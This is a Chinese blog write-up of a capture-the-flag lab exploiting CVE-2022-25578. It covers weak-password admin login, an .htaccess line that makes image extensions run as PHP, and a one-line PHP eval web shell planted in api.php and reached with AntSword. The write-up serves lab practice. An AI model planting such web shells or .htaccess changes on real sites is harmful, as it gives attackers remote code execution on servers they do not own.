CVE-2022-25578

CVE-2022-25578步骤

1.进入界面观察是否有存在常见漏洞注入点
请添加图片描述

2.根据观察我们发现最先存在管理员登录界面链接
请添加图片描述

3.进入后台管理员登录系统
请添加图片描述

4.使用弱口令爆破或者简单尝试密码
最终得到账户为admin
密码为tao
然后进入后台登录界面
请添加图片描述

5.观察界面我可以看到有一个文件管理选项,我们点击发现可以修改里面的文件。
请添加图片描述

6.根据题目提示我们可以清楚的看到存在.htaccess文件
所以我们在.htaccess文件中写入代码 AddType application/x-httpd-php .jpeg .png 然后保存

请添加图片描述

请添加图片描述

7.然后再往下面的PHP可执行程序中输入

<?php eval($_REQUEST['pwd']); ?>

请添加图片描述

8.使用蚁剑进行链接
我们更改的文件是[api.php]
所以我们链接地址是http://eci-2ze4huica8havtwmyafv.cloudeci1.ichunqiu.com/api.php

请添加图片描述

9.然后用蚁剑进入 虚拟终端界面
请添加图片描述

就可以看到flag

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值